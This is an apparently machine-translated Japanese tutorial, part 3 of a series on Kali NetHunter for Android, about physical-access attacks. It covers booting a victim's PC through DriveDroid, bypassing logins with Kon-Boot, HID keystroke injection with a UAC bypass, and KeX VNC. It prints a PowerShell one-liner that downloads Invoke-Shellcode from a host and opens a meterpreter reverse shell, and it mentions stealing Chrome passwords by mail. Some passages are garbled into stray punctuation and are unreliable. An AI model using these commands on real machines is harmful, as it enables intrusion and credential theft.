Android䞊のKaliLinux NetHunterパヌト3距離を瞮める





サむクルからの蚘事
Kali Linux NetHunter Android:

Kali Linux NetHunter Android .2:

Kali Linux NetHunter Android .3:





読者の皆さん、こんにちはNethuterの蚘事シリヌズの前の郚分第1郚ず第2郚を楜しんでいただけたでしょうか。今日は、攻撃者自身が被害者のコンピュヌタヌに盎接物理的にアクセスできる攻撃に焊点を圓おたす。じゃ、行こう。



DriveDroid



DriveDroidは、デバむスがCD / DVDドラむブたたはUSBフラッシュドラむブのふりをするこずを可胜にするアプリケヌションです。 Nethunterには含たれおいたせんが、Nethunterアプリストアにありたすちなみに、Play Marketにもありたす。そしおもちろん、アプリケヌションが機胜するにはルヌト暩限が必芁です。



DriveDroidを䜿甚するず、ISOおよびIMGむメヌゞファむルを゚ミュレヌトできたす。たた、アプリケヌションは、固定サむズナヌザヌが蚭定の空の画像ファむルを䜜成し、読み取り/曞き蟌み機胜でそれらを゚ミュレヌトできたす。これは、もう少し䟿利です。



アプリケヌションは、最初に起動するずきに構成する必芁がありたす。画面が順番に衚瀺され、それぞれで特定のアクションを実行する必芁がありたす。ルヌト暩限の指定、むメヌゞのディレクトリの指定、USBを䜿甚するシステムの遞択などです。䞀般的に、この蚭定は「さらに遠く、さらに倧䞈倫」ずいう叀い原則に䌌おいるため、ここでは詳しく説明したせん。取り付けがうたくいかない堎合は、USBを䜿甚するためにシステムを倉曎する必芁があり、いく぀かのオプションから遞択できるこずを付け加えおおきたす掚奚オプションは䞊郚にありたす。







図1。DriveDroidのセットアップずむンタヌフェヌス。



これで、さたざたなむメヌゞをマりントしお、それらから起動できたす。最初は、1぀のテストむメヌゞ「DriveDroidBootTester」のみが䜿甚可胜です。それをクリックするず、いく぀かのマりントオプションが衚瀺されたす。



  • 読み取りモヌドのUSBフラッシュドラむブのように、
  • /,
  • .


マりントに必芁なオプションを遞択し「読み取り専甚usb」を遞択、コンピュヌタヌを再起動し、倖郚デバむスからの起動が望たしいようにBIOSでデバむスの起動優先床を倉曎したすはい、Windowsを再むンストヌルするのず同じです:)。すべおが正しく行われるず、コンピュヌタヌぱミュレヌトされたテストむメヌゞから起動したすこれがそれであるこずがすぐにわかりたす。





図2。 DriveDroidテストむメヌゞからの起動画面。



このアプリケヌションを䜿甚するず、LiveCDを介しお被害者のコンピュヌタヌで起動でき、マシンにハヌドディスク暗号化がむンストヌルされおいない堎合は、必芁なファむルをダりンロヌドできたす。原則ずしお、゚ミュレヌトされたLiveCDで蚱可されおいるアクションを実行できたす。りむルススキャンの実行、パヌティションの再パヌティション化、OSのむンストヌル、およびその他の可胜なオプションです。



特に、WindowsおよびMacマシンで認蚌をバむパスできるKon-Bootツヌルに぀いお説明したす。Windowsのリリヌスノヌトはこちら、Macのリリヌスノヌトはこちら。最新バヌゞョンのWindows甚ナヌティリティは、Windows 10でのオンラむン認蚌をバむパスする方法も知っおいたす。ただし、ナヌティリティは有料であり、いずれかのOSの個人ラむセンスの費甚は25ドルからであるため、あたり満足しないでください。あなたはあなたの奜きな貯金箱を振る必芁がありたす。䜿甚法のアルゎリズムは単玔です。



  • DriveDroidを䜿甚しおナヌティリティむメヌゞをマりントしたす。
  • そこから起動し必芁に応じおBIOSで起動優先床を倉曎したす、Kon-BootロヌダヌがWindowsの起動を開始したす。
  • 任意のナヌザヌを遞択し、空のパスワヌドでその䞋に移動したす。


私のものではなく䜜品を玹介するビデオはここで芋るこずができたす。



ナヌザヌ䜓隓
(Kon-Boot 2.4) Windows 7 home extended . . DriveDroid. IMG- 30 , “Writable USB”. , Kon-Boot “”-.



HID攻撃



Nethunterには、HID攻撃を実行するためのツヌルがいく぀か組み蟌たれおいたすヒュヌマンむンタヌフェむスデバむス。これらの攻撃を実行するには、攻撃されたマシンに盎接アクセスし、そのマシンで特定のアクションを実行する機胜が必芁ですシステムのロックを解陀する必芁がありたす。HID攻撃は、システムによっお正圓なナヌザヌの動䜜ずしお認識されたす。アンチりむルス゜フトりェアは、原則ずしお、攻撃自䜓には機胜したせんが、䜿甚枈みの負荷には機胜したす。たずえば、悪意のあるファむルをダりンロヌドする堎合や、meterpreterセッションを転送するために゚ンコヌドされおいないファむルをダりンロヌドする堎合です。したがっお、攻撃䞭の日垞的な操䜜の時間を短瞮するこずが可胜であり、これは、攻撃されたマシンぞのアクセス時間が制限されおいる状況で非垞に圹立ちたす。



入力蚀語に぀いお
, , . , , . : ( Ducky Script) ( HID Attacks Nethunter). - :





.3. .



, , . : , — . .



ダッキヌスクリプト



Ducky Scriptは、ナヌザヌに代わっお実行されるアクションをスクリプト化するために䜿甚できるスクリプト蚀語です。むンタヌプリタヌプログラムを備えた接続デバむスは、キヌボヌドずマりスの入力をシミュレヌトしお、コンピュヌタヌに信号を送信したす。 Ducky ScriptはUSBラバヌダッキヌデバむスに䜿甚されたす珟圚Amazonでは玄120ドルかかりたす。





図4。 USBラバヌダッキヌデバむスキット。



NethunterにはむンタプリタNetHunterアプリケヌション-「DuckHunterHID」タブが組み蟌たれおいたすが、正しく動䜜させるこずができたせんでした。





図5。 Nethunter-DuckHunterHID。



しかし、NetHunterストアにはRuckyアプリケヌションv 1.9があり、これはDuckScriptむンタヌプリタヌでもありたす。アプリはキヌボヌド入力ずキヌストロヌクを問題なく送信したすが、マりスが動き始めたせん。



Ruckyアプリケヌションを開き、リンク付きのChromeを起動するスクリプトを蚘述しお起動したす。





図6。ラッキヌ。Chrome起動スクリプト。





DuckyScriptの実行がマシン䞊でどのように芋えるか。



ここでされおいるサンプルスクリプトを収集。すばやく壁玙にホットドッグを蚭定するか、Chromeからパスワヌドを盗んで、メヌルで送信しおください...想像できるすべおの可胜性がありたす



HID攻撃



Nethunterアプリには、[HID攻撃]タブがありたす。このグルヌプからの攻撃は、「デバむスがキヌボヌド入力をシミュレヌトする」ずいう原則に基づいお機胜したすが、特定のパタヌンを察象ずしおいたす。プラスは、管理者からコマンドラむンを起動するずきにUACバむパスオプションWin7、Win8、Win10甚があるこずです。したがっお、管理者アカりントの資栌情報を入力する必芁がないように、少なくずもロヌカル管理者の䞋でログむンする必芁がありたす。





図7。UACバむパス。



攻撃を機胜させるために䜕をすべきか
, , MIDI.





.8. MIDI.



HID攻撃のパタヌンを芋おみたしょう。



Powersploit



このパタヌンは、リモヌトマシンからPowershellスクリプトを実行するこずを目的ずしおいたす。これにより、攻撃されたマシンからmeterpreterシェルが転送されたす。





図 9.Nethunter-HID攻撃-PowerSploit。





図 10.コマンドラむンでの実行結果。BASE64文字列をデコヌドした結果。 スクリヌンショットからわかるように、スクリプト実行の問題のために攻撃は倱敗したした。指定されたパラメヌタに基づいお、EmpireProjectリポゞトリのInvoke-Shellcode.ps1を䜿甚する可胜性が最も高いず刀断したした。 Invoke-Shellcode.ps1たたはPowerSploitリポゞトリスクリプトが曎新され、Payloadパラメヌタがありたせん。スクリプトの叀い「適切な」バヌゞョンの䜿甚を図に瀺したす。 10. BASE64で゚ンコヌドされた文字列は、アプリケヌションりィンドりのすべおのパラメヌタヌを衚したす。䜕かを倉曎する堎合は、䞋の「曎新」ボタンを忘れないでください。これは重芁です。



iex (New-Object Net.WebClient).DownloadString("http://192.168.1.45:80/Invoke-Shellcode.ps1"); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 192.168.1.45 -Lport 8080 -Force















したがっお、開発者がNethunterアプリケヌションのこの郚分を曎新するのを埅っおいたす。



WindowsCMD



ここではすべおが簡単です。このパタヌンでは、コマンドラむンが起動され、scriptパラメヌタヌで指定されたコマンドが順次実行されたす。管理者ずしおコマンドラむンを実行するこずもできたす。保存したスクリプトを保存およびロヌドできたす。そしお、「曎新」ボタンを忘れないでください。





図11.Nethunter-HID攻撃-WindowsCMD。





図12.コマンドラむンでの実行結果。



泚意
“*”, . , “ipconfig” “pconfig”. :)



Powershell HTTPペむロヌド



このパタヌンは、Powershellペむロヌドをロヌドしお実行する必芁がありたす。しかし、それは私にはたったく機胜したせんでした。攻撃が開始されたずき、アクションは発生せず、負荷のあるスクリプトが配眮されたWebサヌバヌのログは空のたたでした。





図13。 Nethunter-HID攻撃-PowershellHTTPペむロヌド。



そしお、読み終えた人のためのちょっずしたボヌナス:)



KeXマネヌゞャヌ



フルカリLinuxデスクトップむンタヌフェヌス、はい、はい Nethunterには、VNCサヌバヌが組み蟌たれおいたす仮想ネットワヌクコンピュヌティング-コンピュヌタヌデスクトップにリモヌトアクセスするためのシステム。すべおが非垞に簡単に蚭定されたす。 Nethunterアプリケヌションの[KeXManager]タブで、[SETUP LOCAL SERVER]ボタンをクリックし、サヌバヌのパスワヌドを蚭定したす。 「STARTSERVER」を抌すず、サヌバヌのステヌタスが「RUNNING」に倉わりたす。 「OPENKEXCLIENT」をクリックし、あらかじめ蚭定したパスワヌドを入力するず、デスクトップむンタヌフェヌスが起動したす。





図14。 VNCサヌバヌの構成ず接続。





図15。 VNCサヌバヌに接続した結果。



別のデバむスから接続する堎合は、[ロヌカルホストのみ]チェックボックスをオフにしお、クラむアントがサヌバヌに「到達」できるようにする必芁がありたす。サヌバヌを再起動したす。たた、別のデバむスでVNCクラむアントを䜿甚しお、NethunterデバむスのIPずポヌト5901たずえば、192.168.1.35901を指定しお接続したす。次に、以前に蚭定したパスワヌドを入力するず、接続されたす。





図16。別のデバむスからVNCサヌバヌに接続した結果。



泚意
C () VeNCrypt .



それは今のずころすべおです。すべおが教育目的のみであるこずを忘れないでください:)たたね







サむクルからの蚘事
Kali Linux NetHunter Android:

Kali Linux NetHunter Android .2:

Kali Linux NetHunter Android .3:




All Articles